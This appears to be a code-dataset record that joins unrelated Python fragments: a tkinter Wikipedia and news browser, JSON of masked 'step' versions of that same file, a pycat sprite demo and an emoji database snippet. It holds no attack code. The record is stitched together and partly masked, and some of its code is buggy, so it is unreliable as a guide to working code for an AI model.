self.top_categories.place(relx=0,rely=0.7,relheight=0.3,relwidth=1)
self.category_map = {}
self.randomize()
self.left_pane.place(relx=0, rely=0, relheight=1, relwidth=0.5)
self.right_pane.place(relx=.5, rely=0, relheight=1, relwidth=0.5)
self.main_page.mainloop()
def search_wikipedia(self):
"""Safely browse wikipedia articles."""
self.summary.delete('1.0', tk.END)
possibilities = wk.search(self.search_box.get('1.0',tk.END).replace("\n",""))
if len(possibilities) > 0:
try:
p = wk.page(possibilities[0])
except wk.DisambiguationError as e:
p = wk.page(e.options[0])
self.summary.configure(state="normal")
self.summary.delete('1.0', tk.END)
self.summary.insert('1.0', p.summary)
self.summary.configure(state="disabled")
self.p = p
self.update_category_map(p.categories)
self.get_news()
return None
def update_choice(self, value):
"""Update box based on menu choice."""
if self.p is not None:
if value == "none":
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', "")
if value == "categories":
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', self.p.categories)
if value == "pageid":
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', self.p.pageid)
if value == "sections":
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', self.p.sections)
if value == "html":
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', self.p.html())
def randomize(self):
"""Randomize wikipedia article."""
self.search_box.delete('1.0', tk.END)
self.search_box.insert('1.0', wk.random())
self.search_wikipedia()
def update_category_map(self, category_list):
"""Update the category map after a search."""
for category in category_list:
skip = False
for i in ["wiki", "sources", "article", "stub",
"wayback", "cs1"]:
if i in category.lower():
skip = True
if skip:
continue
if category in self.category_map:
self.category_map[category] += 1
else:
self.category_map[category] = 1
self.update_top_categories()
def update_top_categories(self):
"""Update the top categories text box."""
cats = self.sorted_categories()
display = ""
for cat in cats:
hit = "hits" if self.category_map[cat] > 1 else "hit"
display += f"{cat}, {self.category_map[cat]} {hit}\n"
self.top_categories.configure(state="normal")
self.top_categories.delete('1.0', tk.END)
self.top_categories.insert('1.0', display)
self.top_categories.configure(state="disabled")
def sorted_categories(self):
"""Sort categories by hits."""
count = lambda category: self.category_map[category]
l = sorted(self.category_map, key=count, reverse=True)
if len(l) > 5:
return l[:5]
else:
return l
def get_news(self):
"""Get news using News API."""
if self.api_key_entry.get() == "":
return None
api = nac(api_key=self.api_key_entry.get())
now = datetime.datetime.utcnow()
two_weeks = (now-datetime.timedelta(days=14))
#today = now.strftime()
query = ""
for cat in self.sorted_categories():
query += f"{cat},"
search = api.get_top_headlines(q=query,
sources="bbc-news,the-verge",
language="en")
news = ""
for article in search["articles"]:
news += f"{search['articles'][article]['title']}\n"
self.news_box.delete('1.0', tk.END)
self.news_box.insert('1.0', news)
if __name__ == "__main__":
main_window = MainWindow()
|
flexible
|
{
"blob_id": "874fa927a1c0f1beeb31ca7b0de7fd2b16218ea4",
"index": 2756,
"step-1": "<mask token>\n\n\nclass MainWindow:\n <mask token>\n <mask token>\n\n def search_wikipedia(self):\n \"\"\"Safely browse wikipedia articles.\"\"\"\n self.summary.delete('1.0', tk.END)\n possibilities = wk.search(self.search_box.get('1.0', tk.END).\n replace('\\n', ''))\n if len(possibilities) > 0:\n try:\n p = wk.page(possibilities[0])\n except wk.DisambiguationError as e:\n p = wk.page(e.options[0])\n self.summary.configure(state='normal')\n self.summary.delete('1.0', tk.END)\n self.summary.insert('1.0', p.summary)\n self.summary.configure(state='disabled')\n self.p = p\n self.update_category_map(p.categories)\n self.get_news()\n return None\n\n def update_choice(self, value):\n \"\"\"Update box based on menu choice.\"\"\"\n if self.p is not None:\n if value == 'none':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', '')\n if value == 'categories':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.categories)\n if value == 'pageid':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.pageid)\n if value == 'sections':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.sections)\n if value == 'html':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.html())\n\n def randomize(self):\n \"\"\"Randomize wikipedia article.\"\"\"\n self.search_box.delete('1.0', tk.END)\n self.search_box.insert('1.0', wk.random())\n self.search_wikipedia()\n\n def update_category_map(self, category_list):\n \"\"\"Update the category map after a search.\"\"\"\n for category in category_list:\n skip = False\n for i in ['wiki', 'sources', 'article', 'stub', 'wayback', 'cs1']:\n if i in category.lower():\n skip = True\n if skip:\n continue\n if category in self.category_map:\n self.category_map[category] += 1\n else:\n self.category_map[category] = 1\n self.update_top_categories()\n\n def update_top_categories(self):\n \"\"\"Update the top categories text box.\"\"\"\n cats = self.sorted_categories()\n display = ''\n for cat in cats:\n hit = 'hits' if self.category_map[cat] > 1 else 'hit'\n display += f'{cat}, {self.category_map[cat]} {hit}\\n'\n self.top_categories.configure(state='normal')\n self.top_categories.delete('1.0', tk.END)\n self.top_categories.insert('1.0', display)\n self.top_categories.configure(state='disabled')\n\n def sorted_categories(self):\n \"\"\"Sort categories by hits.\"\"\"\n count = lambda category: self.category_map[category]\n l = sorted(self.category_map, key=count, reverse=True)\n if len(l) > 5:\n return l[:5]\n else:\n return l\n\n def get_news(self):\n \"\"\"Get news using News API.\"\"\"\n if self.api_key_entry.get() == '':\n return None\n api = nac(api_key=self.api_key_entry.get())\n now = datetime.datetime.utcnow()\n two_weeks = now - datetime.timedelta(days=14)\n query = ''\n for cat in self.sorted_categories():\n query += f'{cat},'\n search = api.get_top_headlines(q=query, sources=\n 'bbc-news,the-verge', language='en')\n news = ''\n for article in search['articles']:\n news += f\"{search['articles'][article]['title']}\\n\"\n self.news_box.delete('1.0', tk.END)\n self.news_box.insert('1.0', news)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass MainWindow:\n <mask token>\n\n def __init__(self):\n self.p = None\n self.main_page = tk.Tk()\n self.main_page.title('MetaWikipedia')\n self.main_page.geometry('500x500')\n self.style = ThemedStyle(self.main_page)\n self.style.set_theme('scidblue')\n self.left_pane = ttk.PanedWindow(self.main_page)\n self.right_pane = ttk.PanedWindow(self.main_page)\n self.search = ttk.Button(self.left_pane, text='Search', command=\n self.search_wikipedia)\n self.search.place(relx=0, rely=0, relheight=0.1, relwidth=0.5)\n self.randomize_but = ttk.Button(self.left_pane, text='Randomize',\n command=self.randomize)\n self.randomize_but.place(relx=0.5, rely=0, relheight=0.1, relwidth=0.5)\n self.search_box = tk.Text(self.left_pane)\n self.search_box.place(relx=0, rely=0.1, relheight=0.1, relwidth=1)\n self.summary = tk.Text(self.left_pane, wrap=tk.WORD)\n self.summary.place(relx=0, rely=0.2, relheight=0.4, relwidth=1)\n extra_list_choices = ['none', 'categories', 'pageid', 'sections',\n 'html']\n self.extra_list_choice = tk.StringVar()\n self.extra_list_choice.set('none')\n self.extra_list = ttk.OptionMenu(self.left_pane, self.\n extra_list_choice, *extra_list_choices, command=self.update_choice)\n self.extra_list.place(relx=0, rely=0.6, relheight=0.1, relwidth=1)\n self.other_text = tk.Text(self.left_pane)\n self.other_text.place(relx=0, rely=0.7, relheight=0.3, relwidth=1)\n self.api_key_label = ttk.Label(self.right_pane, text='API Key')\n self.api_key_label.place(relx=0, rely=0, relheight=0.1, relwidth=0.4)\n self.api_key_entry = ttk.Entry(self.right_pane, text='ABC...')\n self.api_key_entry.place(relx=0.4, rely=0, relheight=0.1, relwidth=0.6)\n self.news_box = tk.Text(self.right_pane)\n self.news_box.place(relx=0, rely=0.1, relheight=0.5, relwidth=1)\n self.top_categories_label = ttk.Label(self.right_pane, text=\n 'Top Categories')\n self.top_categories_label.place(relx=0, rely=0.6, relheight=0.1,\n relwidth=1)\n self.top_categories = tk.Text(self.right_pane)\n self.top_categories.place(relx=0, rely=0.7, relheight=0.3, relwidth=1)\n self.category_map = {}\n self.randomize()\n self.left_pane.place(relx=0, rely=0, relheight=1, relwidth=0.5)\n self.right_pane.place(relx=0.5, rely=0, relheight=1, relwidth=0.5)\n self.main_page.mainloop()\n\n def search_wikipedia(self):\n \"\"\"Safely browse wikipedia articles.\"\"\"\n self.summary.delete('1.0', tk.END)\n possibilities = wk.search(self.search_box.get('1.0', tk.END).\n replace('\\n', ''))\n if len(possibilities) > 0:\n try:\n p = wk.page(possibilities[0])\n except wk.DisambiguationError as e:\n p = wk.page(e.options[0])\n self.summary.configure(state='normal')\n self.summary.delete('1.0', tk.END)\n self.summary.insert('1.0', p.summary)\n self.summary.configure(state='disabled')\n self.p = p\n self.update_category_map(p.categories)\n self.get_news()\n return None\n\n def update_choice(self, value):\n \"\"\"Update box based on menu choice.\"\"\"\n if self.p is not None:\n if value == 'none':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', '')\n if value == 'categories':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.categories)\n if value == 'pageid':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.pageid)\n if value == 'sections':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.sections)\n if value == 'html':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.html())\n\n def randomize(self):\n \"\"\"Randomize wikipedia article.\"\"\"\n self.search_box.delete('1.0', tk.END)\n self.search_box.insert('1.0', wk.random())\n self.search_wikipedia()\n\n def update_category_map(self, category_list):\n \"\"\"Update the category map after a search.\"\"\"\n for category in category_list:\n skip = False\n for i in ['wiki', 'sources', 'article', 'stub', 'wayback', 'cs1']:\n if i in category.lower():\n skip = True\n if skip:\n continue\n if category in self.category_map:\n self.category_map[category] += 1\n else:\n self.category_map[category] = 1\n self.update_top_categories()\n\n def update_top_categories(self):\n \"\"\"Update the top categories text box.\"\"\"\n cats = self.sorted_categories()\n display = ''\n for cat in cats:\n hit = 'hits' if self.category_map[cat] > 1 else 'hit'\n display += f'{cat}, {self.category_map[cat]} {hit}\\n'\n self.top_categories.configure(state='normal')\n self.top_categories.delete('1.0', tk.END)\n self.top_categories.insert('1.0', display)\n self.top_categories.configure(state='disabled')\n\n def sorted_categories(self):\n \"\"\"Sort categories by hits.\"\"\"\n count = lambda category: self.category_map[category]\n l = sorted(self.category_map, key=count, reverse=True)\n if len(l) > 5:\n return l[:5]\n else:\n return l\n\n def get_news(self):\n \"\"\"Get news using News API.\"\"\"\n if self.api_key_entry.get() == '':\n return None\n api = nac(api_key=self.api_key_entry.get())\n now = datetime.datetime.utcnow()\n two_weeks = now - datetime.timedelta(days=14)\n query = ''\n for cat in self.sorted_categories():\n query += f'{cat},'\n search = api.get_top_headlines(q=query, sources=\n 'bbc-news,the-verge', language='en')\n news = ''\n for article in search['articles']:\n news += f\"{search['articles'][article]['title']}\\n\"\n self.news_box.delete('1.0', tk.END)\n self.news_box.insert('1.0', news)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass MainWindow:\n \"\"\"Application controller object.\"\"\"\n\n def __init__(self):\n self.p = None\n self.main_page = tk.Tk()\n self.main_page.title('MetaWikipedia')\n self.main_page.geometry('500x500')\n self.style = ThemedStyle(self.main_page)\n self.style.set_theme('scidblue')\n self.left_pane = ttk.PanedWindow(self.main_page)\n self.right_pane = ttk.PanedWindow(self.main_page)\n self.search = ttk.Button(self.left_pane, text='Search', command=\n self.search_wikipedia)\n self.search.place(relx=0, rely=0, relheight=0.1, relwidth=0.5)\n self.randomize_but = ttk.Button(self.left_pane, text='Randomize',\n command=self.randomize)\n self.randomize_but.place(relx=0.5, rely=0, relheight=0.1, relwidth=0.5)\n self.search_box = tk.Text(self.left_pane)\n self.search_box.place(relx=0, rely=0.1, relheight=0.1, relwidth=1)\n self.summary = tk.Text(self.left_pane, wrap=tk.WORD)\n self.summary.place(relx=0, rely=0.2, relheight=0.4, relwidth=1)\n extra_list_choices = ['none', 'categories', 'pageid', 'sections',\n 'html']\n self.extra_list_choice = tk.StringVar()\n self.extra_list_choice.set('none')\n self.extra_list = ttk.OptionMenu(self.left_pane, self.\n extra_list_choice, *extra_list_choices, command=self.update_choice)\n self.extra_list.place(relx=0, rely=0.6, relheight=0.1, relwidth=1)\n self.other_text = tk.Text(self.left_pane)\n self.other_text.place(relx=0, rely=0.7, relheight=0.3, relwidth=1)\n self.api_key_label = ttk.Label(self.right_pane, text='API Key')\n self.api_key_label.place(relx=0, rely=0, relheight=0.1, relwidth=0.4)\n self.api_key_entry = ttk.Entry(self.right_pane, text='ABC...')\n self.api_key_entry.place(relx=0.4, rely=0, relheight=0.1, relwidth=0.6)\n self.news_box = tk.Text(self.right_pane)\n self.news_box.place(relx=0, rely=0.1, relheight=0.5, relwidth=1)\n self.top_categories_label = ttk.Label(self.right_pane, text=\n 'Top Categories')\n self.top_categories_label.place(relx=0, rely=0.6, relheight=0.1,\n relwidth=1)\n self.top_categories = tk.Text(self.right_pane)\n self.top_categories.place(relx=0, rely=0.7, relheight=0.3, relwidth=1)\n self.category_map = {}\n self.randomize()\n self.left_pane.place(relx=0, rely=0, relheight=1, relwidth=0.5)\n self.right_pane.place(relx=0.5, rely=0, relheight=1, relwidth=0.5)\n self.main_page.mainloop()\n\n def search_wikipedia(self):\n \"\"\"Safely browse wikipedia articles.\"\"\"\n self.summary.delete('1.0', tk.END)\n possibilities = wk.search(self.search_box.get('1.0', tk.END).\n replace('\\n', ''))\n if len(possibilities) > 0:\n try:\n p = wk.page(possibilities[0])\n except wk.DisambiguationError as e:\n p = wk.page(e.options[0])\n self.summary.configure(state='normal')\n self.summary.delete('1.0', tk.END)\n self.summary.insert('1.0', p.summary)\n self.summary.configure(state='disabled')\n self.p = p\n self.update_category_map(p.categories)\n self.get_news()\n return None\n\n def update_choice(self, value):\n \"\"\"Update box based on menu choice.\"\"\"\n if self.p is not None:\n if value == 'none':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', '')\n if value == 'categories':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.categories)\n if value == 'pageid':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.pageid)\n if value == 'sections':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.sections)\n if value == 'html':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.html())\n\n def randomize(self):\n \"\"\"Randomize wikipedia article.\"\"\"\n self.search_box.delete('1.0', tk.END)\n self.search_box.insert('1.0', wk.random())\n self.search_wikipedia()\n\n def update_category_map(self, category_list):\n \"\"\"Update the category map after a search.\"\"\"\n for category in category_list:\n skip = False\n for i in ['wiki', 'sources', 'article', 'stub', 'wayback', 'cs1']:\n if i in category.lower():\n skip = True\n if skip:\n continue\n if category in self.category_map:\n self.category_map[category] += 1\n else:\n self.category_map[category] = 1\n self.update_top_categories()\n\n def update_top_categories(self):\n \"\"\"Update the top categories text box.\"\"\"\n cats = self.sorted_categories()\n display = ''\n for cat in cats:\n hit = 'hits' if self.category_map[cat] > 1 else 'hit'\n display += f'{cat}, {self.category_map[cat]} {hit}\\n'\n self.top_categories.configure(state='normal')\n self.top_categories.delete('1.0', tk.END)\n self.top_categories.insert('1.0', display)\n self.top_categories.configure(state='disabled')\n\n def sorted_categories(self):\n \"\"\"Sort categories by hits.\"\"\"\n count = lambda category: self.category_map[category]\n l = sorted(self.category_map, key=count, reverse=True)\n if len(l) > 5:\n return l[:5]\n else:\n return l\n\n def get_news(self):\n \"\"\"Get news using News API.\"\"\"\n if self.api_key_entry.get() == '':\n return None\n api = nac(api_key=self.api_key_entry.get())\n now = datetime.datetime.utcnow()\n two_weeks = now - datetime.timedelta(days=14)\n query = ''\n for cat in self.sorted_categories():\n query += f'{cat},'\n search = api.get_top_headlines(q=query, sources=\n 'bbc-news,the-verge', language='en')\n news = ''\n for article in search['articles']:\n news += f\"{search['articles'][article]['title']}\\n\"\n self.news_box.delete('1.0', tk.END)\n self.news_box.insert('1.0', news)\n\n\nif __name__ == '__main__':\n main_window = MainWindow()\n",
"step-4": "<mask token>\nimport tkinter as tk\nfrom tkinter import ttk\nfrom ttkthemes import ThemedStyle\nimport wikipedia as wk\nfrom newsapi import NewsApiClient as nac\nimport datetime\nimport random\n\n\nclass MainWindow:\n \"\"\"Application controller object.\"\"\"\n\n def __init__(self):\n self.p = None\n self.main_page = tk.Tk()\n self.main_page.title('MetaWikipedia')\n self.main_page.geometry('500x500')\n self.style = ThemedStyle(self.main_page)\n self.style.set_theme('scidblue')\n self.left_pane = ttk.PanedWindow(self.main_page)\n self.right_pane = ttk.PanedWindow(self.main_page)\n self.search = ttk.Button(self.left_pane, text='Search', command=\n self.search_wikipedia)\n self.search.place(relx=0, rely=0, relheight=0.1, relwidth=0.5)\n self.randomize_but = ttk.Button(self.left_pane, text='Randomize',\n command=self.randomize)\n self.randomize_but.place(relx=0.5, rely=0, relheight=0.1, relwidth=0.5)\n self.search_box = tk.Text(self.left_pane)\n self.search_box.place(relx=0, rely=0.1, relheight=0.1, relwidth=1)\n self.summary = tk.Text(self.left_pane, wrap=tk.WORD)\n self.summary.place(relx=0, rely=0.2, relheight=0.4, relwidth=1)\n extra_list_choices = ['none', 'categories', 'pageid', 'sections',\n 'html']\n self.extra_list_choice = tk.StringVar()\n self.extra_list_choice.set('none')\n self.extra_list = ttk.OptionMenu(self.left_pane, self.\n extra_list_choice, *extra_list_choices, command=self.update_choice)\n self.extra_list.place(relx=0, rely=0.6, relheight=0.1, relwidth=1)\n self.other_text = tk.Text(self.left_pane)\n self.other_text.place(relx=0, rely=0.7, relheight=0.3, relwidth=1)\n self.api_key_label = ttk.Label(self.right_pane, text='API Key')\n self.api_key_label.place(relx=0, rely=0, relheight=0.1, relwidth=0.4)\n self.api_key_entry = ttk.Entry(self.right_pane, text='ABC...')\n self.api_key_entry.place(relx=0.4, rely=0, relheight=0.1, relwidth=0.6)\n self.news_box = tk.Text(self.right_pane)\n self.news_box.place(relx=0, rely=0.1, relheight=0.5, relwidth=1)\n self.top_categories_label = ttk.Label(self.right_pane, text=\n 'Top Categories')\n self.top_categories_label.place(relx=0, rely=0.6, relheight=0.1,\n relwidth=1)\n self.top_categories = tk.Text(self.right_pane)\n self.top_categories.place(relx=0, rely=0.7, relheight=0.3, relwidth=1)\n self.category_map = {}\n self.randomize()\n self.left_pane.place(relx=0, rely=0, relheight=1, relwidth=0.5)\n self.right_pane.place(relx=0.5, rely=0, relheight=1, relwidth=0.5)\n self.main_page.mainloop()\n\n def search_wikipedia(self):\n \"\"\"Safely browse wikipedia articles.\"\"\"\n self.summary.delete('1.0', tk.END)\n possibilities = wk.search(self.search_box.get('1.0', tk.END).\n replace('\\n', ''))\n if len(possibilities) > 0:\n try:\n p = wk.page(possibilities[0])\n except wk.DisambiguationError as e:\n p = wk.page(e.options[0])\n self.summary.configure(state='normal')\n self.summary.delete('1.0', tk.END)\n self.summary.insert('1.0', p.summary)\n self.summary.configure(state='disabled')\n self.p = p\n self.update_category_map(p.categories)\n self.get_news()\n return None\n\n def update_choice(self, value):\n \"\"\"Update box based on menu choice.\"\"\"\n if self.p is not None:\n if value == 'none':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', '')\n if value == 'categories':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.categories)\n if value == 'pageid':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.pageid)\n if value == 'sections':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.sections)\n if value == 'html':\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.html())\n\n def randomize(self):\n \"\"\"Randomize wikipedia article.\"\"\"\n self.search_box.delete('1.0', tk.END)\n self.search_box.insert('1.0', wk.random())\n self.search_wikipedia()\n\n def update_category_map(self, category_list):\n \"\"\"Update the category map after a search.\"\"\"\n for category in category_list:\n skip = False\n for i in ['wiki', 'sources', 'article', 'stub', 'wayback', 'cs1']:\n if i in category.lower():\n skip = True\n if skip:\n continue\n if category in self.category_map:\n self.category_map[category] += 1\n else:\n self.category_map[category] = 1\n self.update_top_categories()\n\n def update_top_categories(self):\n \"\"\"Update the top categories text box.\"\"\"\n cats = self.sorted_categories()\n display = ''\n for cat in cats:\n hit = 'hits' if self.category_map[cat] > 1 else 'hit'\n display += f'{cat}, {self.category_map[cat]} {hit}\\n'\n self.top_categories.configure(state='normal')\n self.top_categories.delete('1.0', tk.END)\n self.top_categories.insert('1.0', display)\n self.top_categories.configure(state='disabled')\n\n def sorted_categories(self):\n \"\"\"Sort categories by hits.\"\"\"\n count = lambda category: self.category_map[category]\n l = sorted(self.category_map, key=count, reverse=True)\n if len(l) > 5:\n return l[:5]\n else:\n return l\n\n def get_news(self):\n \"\"\"Get news using News API.\"\"\"\n if self.api_key_entry.get() == '':\n return None\n api = nac(api_key=self.api_key_entry.get())\n now = datetime.datetime.utcnow()\n two_weeks = now - datetime.timedelta(days=14)\n query = ''\n for cat in self.sorted_categories():\n query += f'{cat},'\n search = api.get_top_headlines(q=query, sources=\n 'bbc-news,the-verge', language='en')\n news = ''\n for article in search['articles']:\n news += f\"{search['articles'][article]['title']}\\n\"\n self.news_box.delete('1.0', tk.END)\n self.news_box.insert('1.0', news)\n\n\nif __name__ == '__main__':\n main_window = MainWindow()\n",
"step-5": "\"\"\"main.py\"\"\"\n\nimport tkinter as tk\nfrom tkinter import ttk\nfrom ttkthemes import ThemedStyle\nimport wikipedia as wk\nfrom newsapi import NewsApiClient as nac\nimport datetime\nimport random\n\nclass MainWindow:\n \"\"\"Application controller object.\"\"\"\n \n def __init__(self):\n self.p = None\n \n self.main_page = tk.Tk()\n self.main_page.title(\"MetaWikipedia\")\n self.main_page.geometry(\"500x500\")\n\n self.style = ThemedStyle(self.main_page)\n self.style.set_theme(\"scidblue\")\n\n self.left_pane = ttk.PanedWindow(self.main_page)\n self.right_pane = ttk.PanedWindow(self.main_page)\n\n # Left pane\n self.search = ttk.Button(self.left_pane, text=\"Search\", command=self.search_wikipedia)\n self.search.place(relx=0,rely=0,relheight=0.1,relwidth=0.5)\n\n self.randomize_but = ttk.Button(self.left_pane, text=\"Randomize\", command=self.randomize)\n self.randomize_but.place(relx=0.5,rely=0,relheight=0.1,relwidth=0.5)\n\n self.search_box = tk.Text(self.left_pane)\n self.search_box.place(relx=0,rely=0.1,relheight=0.1,relwidth=1)\n\n self.summary = tk.Text(self.left_pane, wrap=tk.WORD)\n self.summary.place(relx=0,rely=0.2,relheight=0.4,relwidth=1)\n\n extra_list_choices = [\"none\", \"categories\", \"pageid\", \"sections\", \"html\"]\n self.extra_list_choice = tk.StringVar()\n self.extra_list_choice.set(\"none\")\n self.extra_list = ttk.OptionMenu(\n self.left_pane,\n self.extra_list_choice,\n *extra_list_choices,\n command=self.update_choice\n )\n self.extra_list.place(relx=0,rely=.6,relheight=.1,relwidth=1)\n\n self.other_text = tk.Text(self.left_pane)\n self.other_text.place(relx=0,rely=0.7,relheight=.3,relwidth=1)\n\n\n # Right pane\n self.api_key_label = ttk.Label(self.right_pane, text=\"API Key\")\n self.api_key_label.place(relx=0, rely=0, relheight=0.1, relwidth=.4)\n\n self.api_key_entry = ttk.Entry(self.right_pane, text=\"ABC...\")\n self.api_key_entry.place(relx=.4, rely=0, relheight=0.1, relwidth=.6)\n\n self.news_box = tk.Text(self.right_pane)\n self.news_box.place(relx=0, rely=.1, relheight=.5, relwidth=1)\n\n self.top_categories_label = ttk.Label(self.right_pane, text=\"Top Categories\")\n self.top_categories_label.place(relx=0,rely=0.6,relheight=0.1,relwidth=1)\n\n self.top_categories = tk.Text(self.right_pane)\n self.top_categories.place(relx=0,rely=0.7,relheight=0.3,relwidth=1)\n\n self.category_map = {}\n\n self.randomize()\n \n self.left_pane.place(relx=0, rely=0, relheight=1, relwidth=0.5)\n self.right_pane.place(relx=.5, rely=0, relheight=1, relwidth=0.5)\n self.main_page.mainloop()\n\n def search_wikipedia(self):\n \"\"\"Safely browse wikipedia articles.\"\"\"\n self.summary.delete('1.0', tk.END)\n possibilities = wk.search(self.search_box.get('1.0',tk.END).replace(\"\\n\",\"\"))\n if len(possibilities) > 0:\n try:\n p = wk.page(possibilities[0])\n except wk.DisambiguationError as e:\n p = wk.page(e.options[0])\n self.summary.configure(state=\"normal\")\n self.summary.delete('1.0', tk.END)\n self.summary.insert('1.0', p.summary)\n self.summary.configure(state=\"disabled\")\n self.p = p\n self.update_category_map(p.categories)\n self.get_news()\n return None\n\n def update_choice(self, value):\n \"\"\"Update box based on menu choice.\"\"\"\n if self.p is not None:\n if value == \"none\":\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', \"\")\n if value == \"categories\":\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.categories)\n if value == \"pageid\":\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.pageid)\n if value == \"sections\":\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.sections)\n if value == \"html\":\n self.other_text.delete('1.0', tk.END)\n self.other_text.insert('1.0', self.p.html())\n\n def randomize(self):\n \"\"\"Randomize wikipedia article.\"\"\"\n self.search_box.delete('1.0', tk.END)\n self.search_box.insert('1.0', wk.random())\n self.search_wikipedia()\n\n def update_category_map(self, category_list):\n \"\"\"Update the category map after a search.\"\"\"\n for category in category_list:\n skip = False\n for i in [\"wiki\", \"sources\", \"article\", \"stub\",\n \"wayback\", \"cs1\"]:\n if i in category.lower():\n skip = True\n if skip:\n continue\n if category in self.category_map:\n self.category_map[category] += 1\n else:\n self.category_map[category] = 1\n self.update_top_categories()\n\n def update_top_categories(self):\n \"\"\"Update the top categories text box.\"\"\"\n cats = self.sorted_categories()\n display = \"\"\n for cat in cats:\n hit = \"hits\" if self.category_map[cat] > 1 else \"hit\"\n display += f\"{cat}, {self.category_map[cat]} {hit}\\n\"\n self.top_categories.configure(state=\"normal\")\n self.top_categories.delete('1.0', tk.END)\n self.top_categories.insert('1.0', display)\n self.top_categories.configure(state=\"disabled\")\n\n def sorted_categories(self):\n \"\"\"Sort categories by hits.\"\"\"\n count = lambda category: self.category_map[category]\n l = sorted(self.category_map, key=count, reverse=True)\n if len(l) > 5:\n return l[:5]\n else:\n return l\n\n def get_news(self):\n \"\"\"Get news using News API.\"\"\"\n if self.api_key_entry.get() == \"\":\n return None\n api = nac(api_key=self.api_key_entry.get())\n now = datetime.datetime.utcnow()\n two_weeks = (now-datetime.timedelta(days=14))\n #today = now.strftime()\n query = \"\"\n for cat in self.sorted_categories():\n query += f\"{cat},\"\n search = api.get_top_headlines(q=query,\n sources=\"bbc-news,the-verge\",\n language=\"en\")\n news = \"\"\n for article in search[\"articles\"]:\n news += f\"{search['articles'][article]['title']}\\n\"\n self.news_box.delete('1.0', tk.END)\n self.news_box.insert('1.0', news)\n\n\n\nif __name__ == \"__main__\":\n main_window = MainWindow()\n",
"step-ids": [
8,
9,
11,
12,
13
]
}
|
[
8,
9,
11,
12,
13
] |
from pycat.base.color import Color
from pycat.sprite import Sprite
from pycat.window import Window
from pyglet.gl.glext_arb import GL_FONT_HEIGHT_NV
from random import randint
window=Window()
class Chick(Sprite):
def on_create(self):
self.image = 'chick-a.png'
self.goto_random_position()
self.opacity = 500
self.scale = 1
self.rotation = randint(0, 360)
# c1 = window.create_sprite(Chick)
# c2 = window.create_sprite(Chick)
for i in range(1000):
e = window.create_sprite(Chick)
e.opacity = 200
e.scale = 2
e.color = Color.RED
window.run()
|
normal
|
{
"blob_id": "cc7942c406e9bcb5af43f131fdf0a6441f81c16a",
"index": 4260,
"step-1": "<mask token>\n\n\nclass Chick(Sprite):\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Chick(Sprite):\n\n def on_create(self):\n self.image = 'chick-a.png'\n self.goto_random_position()\n self.opacity = 500\n self.scale = 1\n self.rotation = randint(0, 360)\n\n\nfor i in range(1000):\n e = window.create_sprite(Chick)\n e.opacity = 200\n e.scale = 2\n e.color = Color.RED\nwindow.run()\n",
"step-3": "<mask token>\nwindow = Window()\n\n\nclass Chick(Sprite):\n\n def on_create(self):\n self.image = 'chick-a.png'\n self.goto_random_position()\n self.opacity = 500\n self.scale = 1\n self.rotation = randint(0, 360)\n\n\nfor i in range(1000):\n e = window.create_sprite(Chick)\n e.opacity = 200\n e.scale = 2\n e.color = Color.RED\nwindow.run()\n",
"step-4": "from pycat.base.color import Color\nfrom pycat.sprite import Sprite\nfrom pycat.window import Window\nfrom pyglet.gl.glext_arb import GL_FONT_HEIGHT_NV\nfrom random import randint\nwindow = Window()\n\n\nclass Chick(Sprite):\n\n def on_create(self):\n self.image = 'chick-a.png'\n self.goto_random_position()\n self.opacity = 500\n self.scale = 1\n self.rotation = randint(0, 360)\n\n\nfor i in range(1000):\n e = window.create_sprite(Chick)\n e.opacity = 200\n e.scale = 2\n e.color = Color.RED\nwindow.run()\n",
"step-5": "from pycat.base.color import Color\nfrom pycat.sprite import Sprite\nfrom pycat.window import Window\nfrom pyglet.gl.glext_arb import GL_FONT_HEIGHT_NV\nfrom random import randint\nwindow=Window()\n\n\nclass Chick(Sprite):\n\n def on_create(self):\n self.image = 'chick-a.png'\n self.goto_random_position()\n self.opacity = 500\n self.scale = 1\n self.rotation = randint(0, 360)\n\n\n# c1 = window.create_sprite(Chick)\n# c2 = window.create_sprite(Chick)\n\nfor i in range(1000):\n e = window.create_sprite(Chick)\n e.opacity = 200\n e.scale = 2\n e.color = Color.RED\n\nwindow.run()",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for key, value in response.items():
Emoji = Emojis(name=key, url=value)
session.add(Emoji)
session.commit()
